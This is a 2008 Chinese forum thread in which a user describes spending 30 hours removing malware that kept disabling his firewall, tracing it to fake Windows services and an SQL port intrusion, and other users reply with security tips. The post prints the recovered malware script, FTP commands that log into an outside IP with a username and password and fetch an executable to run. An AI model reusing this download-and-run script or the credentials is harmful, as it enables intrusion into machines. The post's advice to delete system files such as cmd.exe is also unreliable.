与病毒（黑客）斗争的30个小时

不谈风月 · 发表于 2008-5-25 15:11

马上注册，结交更多侠友！

您需要登录才可以下载或查看，没有账号？我要成为铁血侠客

x

一个未知的病毒，总是在工作时，试图终止防火墙。前天出现这个问题，由于当时比较忙，没有理会。到晚上时，又弹出终止防火墙的对话框。于是启动到安全模式下，进行全盘杀毒。昨天早上起来，机器已经自动关闭了。于是重新启动到正常模式下继续工作。不料，没几分钟，又出现关闭防火墙的对话框。由于依然比较忙，再次无视之。

到昨天下午，病毒愈演愈烈。于是根据前天晚上杀毒的情况，继续对发现病毒的文件夹进行杀毒。无果！继续无视之

昨天晚上每隔10来分钟，就弹出一次关闭防火墙的对话框。甚是郁闷，继续杀毒，并且停止手头一切工作，用超级兔子的进程管理器配合，没有发现异常进程。

今天上午，情况严重了，IE总是自动关闭，根本无法浏览网页。火大了，就算你是病毒，也不能太过分啊。
这时突然想起前阵子把3389端口打开忘记关闭了，于是把3389关闭，并且更改系统用户口令。再进入系统，病情依旧。
依靠瑞星已经解决不了问题，那就只好手动干掉了。

再次打开瑞星，对C盘进行全盘杀毒，并且打开windows的任务管理器，密切监视进程变化。果然，在弹出防火墙关闭的前几秒钟，进程会出现一个名为 cmd.exe的玩意。这个是微软的命令行程序，用过Dos的人都知道，这本身没有问题。这个cmd运行起来后，没多久就提示关闭防火墙。好，到此已经知道病毒的基本动作了，那就是利用命令行来关闭防火墙。不过仅仅知道这一项没有什么用。不知道宿主程序的话，这条线索一点用途都没有。

继续找……

用超级兔子，察看启动项。没有发现异常。
瑞星对C盘的全盘杀毒结束，依然没有发现异常。虽然找到了一个以数字命名的病毒文件，但那决不是宿主程序。无非就是删除掉那些文件而已。那些文件从何而来，源头如果不堵住，那用不了几分钟，系统里又会充斥各种病毒了。

打开msconfig，把微软认证项隐藏后，突然发现有两个服务名称不对。一个是Application Managemente，注意后面那个单词，很明显末尾多了一个e。还有一个是Winlogin。在任务管理器里，可以看到Winlogon，而不应该是Winlogin。两个服务的描述非常正确。可是就是这两个服务有问题。名称都是仿冒的。OK，先把这两个服务关闭。这两个服务也不是那么容易关闭的。首先关闭Winlogin，这家伙根本关闭不了。但是可以被禁止。看超级兔子任务管理器，找到了winupdate这个玩意，这玩意就是冒充Winlogon的东西。把它终止后，Winlogin服务可以关闭了。然后关闭Application Managemente，这个更麻烦，服务终止不了，启动项也禁止不了。OK，启动到安全模式下，把这个该死的玩意停止掉。然后再启动到正常模式下。

现在再也没有弹出防火墙关闭的对话框了。不过隐患依然存在。记得之前出现的那个cmd，想起了就觉得很愤怒。猜测是病毒建立了批处理文件。于是找C盘下的类似的文件。当然病毒很聪明，咱也不能傻到光找那些.bat文件。切换到详细信息，然后按文件大小排序，死死的盯着那些大小为1~2K的文件。然后一个个打开，终于在c:\windows\system32下找到了一个system.sys的文件，内容如下

open 60.2.134.246
zhuyanwei
5293710zhu
get 1433.exe C:\tcpsrvs.exe
bye

很明显，第一行是登陆到60.2.134.246这个ip，第二和第三行是用户名和密码，第四行是从这个王八蛋的机器上下载一个1433.exe的程序，然后放到我的C盘，并且重命名为tcpsrvs.exe。然后服务程序主动执行这个tcpsrvs.exe的程序。
顺便说明一下：1433是SQL的端口，1434也是SQL端口。从上面的文件名来看，对方是想通过1433端口入侵我电脑。联想到前两天1434经常被嗅探，因此可以确诊了。而瑞星防火墙把1433对外的端口封闭了，所以对方想通过内部来打开该端口。这个病毒的另外一个特征是，会自动点击瑞星的防火墙，使之许可ftp.exe的文件自动访问网络。其中上面的open和get都是ftp命令行可执行的命令。对于不用Windows上传文件的人来说，可以把ftp.exe删掉或者移动到其他地方，移动后，Windows会报警，直接无视就是，以免后患。另外，Application Managemente服务会自动许可lsass等程序访问网络。
看上去事情可以告一段落了，可是还没等我高兴起来，再次弹出关闭防火墙的对话框。这次真的火大了。
不过有了之前的经验，这次首先逮住cmd.exe不放，发现的确在执行类似.bat的代码。于是迅速记录下前面的一行命令，然后全盘查找带有该命令的文件，经过漫长的等待后，没有发现任何有类似文字的文件存在。突然想起还是1433端口问题，估计对方已经获得了1434注入点了。OK，那么一定是通过SQL执行的，那好办，首先封闭1433、445端口。然后从dellcach里删除cmd.exe和net.exe，然后再删除windows system32目录下的这两个文件。至此，问题已经解决。不过不知道能撑多久，Windows打开的端口太多，而大多端口我甚至连他们是干什么的都不知道，不敢随便关闭，怕引起不必要的麻烦。
其实，最终的这一步才是真正解决cmd运行的关键。对方通过1433端口用SQL执行代码，在获得了1433的控制权之后，就等于从我机器上开了一条供对方使用的专用通道里。于是这几天一直病毒不断。不过前面所作的事情也并非没有意义，那两个服务，估计是在我还蒙在鼓里的时候，被人安插进来的。那两个病毒，瑞星检测不出来。手动清理之后，就放心多了。而最后这一步，把最后的后门关闭了，进一步保证了安全。不过下一次将会出现什么问题就不得而知了，因为Windows的安全实在太烂了，而我的安全知识比Windows还烂。

[发帖际遇]: 胡斐要去和程灵素约会，出门前不谈风月帮他打整了一下络腮胡，得到打赏银两13.

寻侠天下 · 发表于 2008-5-25 15:18

ＬＺ电脑水平不错，在下佩服

[发帖际遇]: 寻侠天下在丽春院喝酒,发掘了人才韦小宝,增加奖惩积分30.

法号无语 · 发表于 2008-5-25 15:20

实在佩服你的毅力...
要是我早抓狂了..

[发帖际遇]: 法号无语请陈园园签名,被吴三桂发现,损失银两30.

jhg10000 · 发表于 2008-5-25 16:27

30小时...
我只会用杀毒杀. 防火墙McAfee还不错. 基本没毒,

Ice · 发表于 2008-5-25 16:46

呃，我把很多服务关闭的，另外对于超过8000以上的端口号都密切关注，至于LZ所说的ftp之类的是我常用，所以只能是日常使用的时候谨慎一点，同时也提醒大家，如果没有足够的系统知识，不要随意关闭各类服务，因为我们根本不知道那些是必用的，哪些是日常用不上的。

另外，大家尽量不要使用默认的admin的管理帐号，最好就是把管理员帐号修改了，并设置密码，鄙人的计算机帐号长达13位英、数、符号组合，密码更是19位的英、数、特殊符号组合，这样的组合如果使用暴力破解的话，那简直就是噩梦，这种安全保护可以杜绝很多威胁的，不要贪图省事……

最后一句话，任何入侵都是利用漏洞，所以，勤快一点打补丁吧，虽然补丁出现在漏洞被发现以后，但是亡羊补牢为时未晚。

柳无色 · 发表于 2008-5-25 17:13

斗争30小时.......
我的话会气得还原或重装......

[发帖际遇]: 柳无色遭遇四大恶人,奋力拼搏,得到银两16两银子

不谈风月 · 发表于 2008-5-25 18:07

原帖由 柳无色 于 2008-5-25 17:13 发表
斗争30小时.......
我的话会气得还原或重装......

[发帖际遇]: 柳无色遭遇四大恶人,奋力拼搏,得到银两16两银子

呵呵，我也想重装系统。不过用到的软件太多，每次装机都要花费一天时间。资料恢复的时间还不包括在内。灾后重建往往比装机更痛苦。所以，如非必要，我一般不考虑重装。我的机器风雨飘摇的走过3年，其中手动干掉病毒无数次。一直都不敢轻易重装。

这次是本来要重装的，不过在和病毒和黑客战斗的过程中，自己玩兴大发，所以干脆先把病毒干掉之后，再考虑是否要重装了。现在病毒虽然被干掉了，不过IE已经完全被破坏，无法修复。这也是我安全知识太少的恶果。女朋友想要一个工具，让我帮忙找，我IE根本开不了，想到用傲游，可是ie开不了，也就无法找到Maxthon的下载地址，临时用微软带的WebBrowser做了个世上最简陋的浏览器，找到Maxthon下载点，下了个傲游在用，发现比IE舒服多了。

[ 本帖最后由不谈风月于 2008-5-25 18:15 编辑 ]